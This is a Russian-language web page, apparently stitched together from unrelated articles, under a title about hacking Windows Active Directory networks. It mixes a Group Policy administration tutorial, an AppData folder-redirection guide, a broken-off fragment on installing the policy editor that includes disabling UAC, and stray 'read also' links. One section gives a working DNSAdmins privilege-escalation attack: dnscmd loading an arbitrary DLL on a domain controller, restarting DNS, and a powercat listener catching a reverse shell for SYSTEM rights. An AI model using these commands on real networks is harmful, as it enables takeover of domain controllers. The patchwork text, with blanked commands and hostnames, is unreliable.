Как взломать сеть Windows базе Active Directory

Как гласит военная наука, имеющая много общего с хакерским ремеслом, прежде чем ввязаться в сражение, нужна разведка местности. О том, как извлечь пользовательские данные в Active Directory, читай в статье «Разведка в Active Directory. Получаем пользовательские данные в сетях Windows без привилегий».

Управление групповыми политиками Active Directory (AD GPO)

В статье описана краткая информация о групповых политиках Active Directory и пример работы с ними на виртуальном сервере с операционной системой Windows Server.

Что такое групповые политики и зачем они нужны?

Групповая политика — это инструмент, доступный для администраторов, работающих с архитектурой Active Directory. Он позволяет централизованно управлять настройками на клиентских компьютерах и серверах, подключенных к домену, а также обеспечивает простой способ распространения программного обеспечения.

Групповые политики позволяют настраивать параметры для определенного набора пользователей или компьютеров внутри домена Active Directory. Также позволяют указать политики в одном месте для группы и применить к целевому набору пользователей.

Например, можно обеспечить применение стандартного набора настроек и конфигураций для групп пользователей или компьютеров в домене или по запросу.

Во всех компаниях как правило есть различные отделы, например отдел системных администраторов, разработчиков, дизайнеров, каждому из отдела необходим свой стандартный набор программного обеспечения, их рабочие компьютеры должны быть сконфигурированы под специальные задачи и нужды.

С помощью групповых политик можно создать наборы настроек для конкретных групп пользователей в домене. С помощью Active Directory GPO можно установить и управлять отдельными унифицированными наборами настроек, конкретно для дизайнеров или разработчиков.

Конфигурации для компьютеров или пользователей проще и эффективнее, т.к. расположены в одном месте и не требуют повтора на каждом компьютере.

Компоненты GPO

Существует два компонента групповых политик — серверный компонент и клиентский, т.е. данная структура относится к архитектуре “клиент-сервер”.

Серверный компонент — оснастка Microsoft Management Console (MMC), которая используется для указания настроек групповой политики.

Читайте также:  Берем под контроль центр обновлений в Windows 10

MMC может быть использована для создания политик для контроля и управления административными шаблонами и настройками безопасности (скрипты, установка ПО и прочее).

Каждый из них называется расширением и в свою очередь каждый из них имеет дочернее расширение, которое разрешает добавление новых компонентов или обновление существующих без возможности затронуть или подвергнуть риску всю политику.

Клиентский компонент интерпретирует и применяет настройки групповой политики для компьютеров пользователей или целевым пользователям. Клиентские расширения — это компоненты, которые запущены на пользовательской системе и несут ответственность за интерпретацию обработки и применения в объекты групповой политики.

Для администрирования GPO используют Group Policy Management Console (GPMC) и Group Policy Management Editor.

Управление групповыми политиками Active Directory (AD GPO)

Сценарии использования Active Directory GPO:

  • Централизованная настройка пакета программ Microsoft Office.
  • Централизованная настройка управлением питанием компьютеров.
  • Настройка веб-браузеров и принтеров.
  • Установка и обновление ПО.
  • Применение определенных правил в зависимости от местоположения пользователя.
  • Централизованные настройки безопасности.
  • Перенаправление каталогов в пределах домена.
  • Настройка прав доступа к приложениям и системным программам.

Оснастка Управление групповыми политиками

После установки роли Active Directory Domain Service (AD DS) на контроллер домена на сервере появится оснастка Group Policy Management. Для того, чтобы ее открыть нажмите комбинацию клавиш Win+R и в открывшемся окне введите:

Нажмите OK.

Если оснастку не удается открыть, то возможно по определенным причинам она не установлена. Установить ее можно через стандартное меню Add roles and features в диспетчере сервера, выбрав компонент Group Policy Management.

Оснастка выглядит следующим образом:

Создание объектов групповой политики

Для создания объекта групповой политики перейдите во вкладку Forest ->Domains -> ->Group Policy Objects. С помощью правой кнопки мыши откройте меню и выберете New.

В открывшемся окне в поле Name введите удобное для вас имя групповой политики.

После этого вы увидите созданный объект в списке.

Теперь необходимо настроить созданный объект под конкретные задачи. в качестве примера удалим ссылку Games из меню Start. Для это с помощью правой кнопки мыши откройте меню объекта и выберете пункт Edit.

В редакторе групповых политик перейдите по иерархии User Configuration ->Policies ->Administrative Templates ->Start Menu and Taskbar. Найдите опцию Remove Games link from Start Menu и в контекстном меню выберете пункт Edit.

Читайте также:  Запуск скрипта powershell из командной строки

В открывшемся окне отметьте Enable

Включение функции перенаправления папок в GPO

Произведем настройку на примере каталога AppData. В редакторе политики конфигурация пользователя — настройки windows — перенаправляемые папки выбираем папку AppData и заходим в её свойства.

На вкладке конечная папка нам дается на выбор два варианта настройки:

Включение функции перенаправления папок в GPO
  1. Перенаправлять папки всех пользователей в одно расположение — это простой режим, как понятно из названия, все каталоги пользователей будут размещаться в одной сетевой шаре
  2. Указать различные расположения для разных групп пользователей — это сложный режим. Он позволяет задать несколько сетевых шар в одной политике. Этот режим использовать не рекомендуется.

Выберем простой режим и зададим значение  Создать папку для каждого пользователя на корневом пути. Для файлового сервера лучше создать CNAME-запись на DNS-сервере, например, , корневой путь в таком случае будет выглядеть \\\redirection.

На вкладке параметры есть три условия:

Включение функции перенаправления папок в GPO
  1. Предоставить права монопольного доступа. Мы уже настроили доступ и данное ограничение не требуется. Если применить это условие, то у группы администраторов не будет доступа к каталогам пользователей.
  2. Перенести содержимое «AppData» в новое расположение. Лучше эту опцию не использовать, или использовать только один раз и потом выключить. Иначе конфликты обеспечены.
  3. Применить политику перенаправления к ОС старее Vista. Если в домене есть старые ОС, то опцию нужно включить.

Также предлагается действие, которое будет произведено, если политика будет удалена. Это уже зависит от ситуации.

Настройки на вкладке параметры лучше произвести заранее, т.к. их дальнейшее редактирование выльется в проблемы.

Включение функции перенаправления папок в GPO

Пару слов о AppData (перемещаемая): перенаправляется только каталог Roaming, а Local и LocalLow остаются на месте. Может получится так, что некоторое ПО будет очень активно использовать эту папку или определённое ПО вообще не умеет работать с перенаправляемой AppData, например, на данный момент это DropBox. Так или иначе проблемы могут возникнуть. С этой папкой надо проводить эксперименты в вашем окружении и принимать решение, быть или не быть.

Остальные папки настраиваются по аналогии.

DNSAdmins

Microsoft не только реализовала собственный DNS-сервер, но и внедрила для него протокол управления, позволяющий интегрировать DNS-сервер с доменами Active Directory. По умолчанию контроллеры домена также являются DNS-серверами, поэтому DNS-серверы должны быть доступны каждому пользователю домена. Это, в свою очередь, открывает потенциальную возможность для атаки на контроллеры домена: с одной стороны мы имеем сам протокол DNS, а с другой — протокол управления, основанный на RPC.

Читайте также:  Horizon Zero Dawn ошибка дамп памяти. Решение проблемы!

Пользователь, входящий в группу DNSAdmins или имеющий права на запись в объекты DNS-сервера, может загрузить на DNS-сервер произвольную DLL с привилегиями System. Это очень опасно, поскольку многие корпоративные сети используют контроллер домена в качестве DNS-сервера.

Таким образом, для реализации атаки мы можем просто загрузить на DNS-сервер произвольную библиотеку с помощью dnscmd (путь \\ops-build\dll должен быть доступен для чтения DC):

PS C:\> dnscmd ops_dc/config/serverlevelplugindll \\ops-build\dll\

Чтобы проверить, была ли загружена DLL, можно использовать следующую команду:

PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

Так как наш пользователь — член группы DNSAdmins, мы можем перезапустить службу DNS:

C:\> sc \\ops-dc stop dns C:\> sc \\ops-dc start dns

DNSAdmins

После перезапуска DNS-сервера будет выполнен код из загруженной библиотеки. Такая библиотека, например, может содержать скрипт PowerShell для обратного подключения.

Пример PowerShell-кода в DLL

После успешного выполнения скрипта мы будем прослушивать на своем хосте обратное подключение:

PS C:\> powercat -l -v -p 443 -t 1000

Пример успешного бэкконнекта

В результате мы получим права system на DC.

Как установить?

Есть 2 решения:

Как установить?
  • перенос файлов редактора из версии Pro, установка компонентов из дистрибутива и установка неофициального приложения, скомпилированного в установщик пользователем для Windows 7 (но оно подходит для версий 8.1 и 10);
  • установка приложения с последующим переносом системных файлов и библиотек.

Важно! Так как вы будете работать с системными файлами, всегда есть вероятность повреждения системы. Рекомендую создать точку восстановления.

Как установить?

Способ 1

Чтобы перенести файлы нужны права администратора.

Как установить?

Отключение UAC

Также рекомендуем отключить UAC прежде чем приступать к переносу. Для этого:

Как установить?
  1. Нажмите правой кнопкой мыши по «Пуск» и выберите «Панель управления».

  2. Перейдите в раздел «Учетные записи пользователей».

  3. В новом окне нажмите «Изменить параметры контроля учетных записей».

  4. Поставьте ползунок в крайнее нижнее состояние «Никогда не уведомлять» и нажмите «ОК».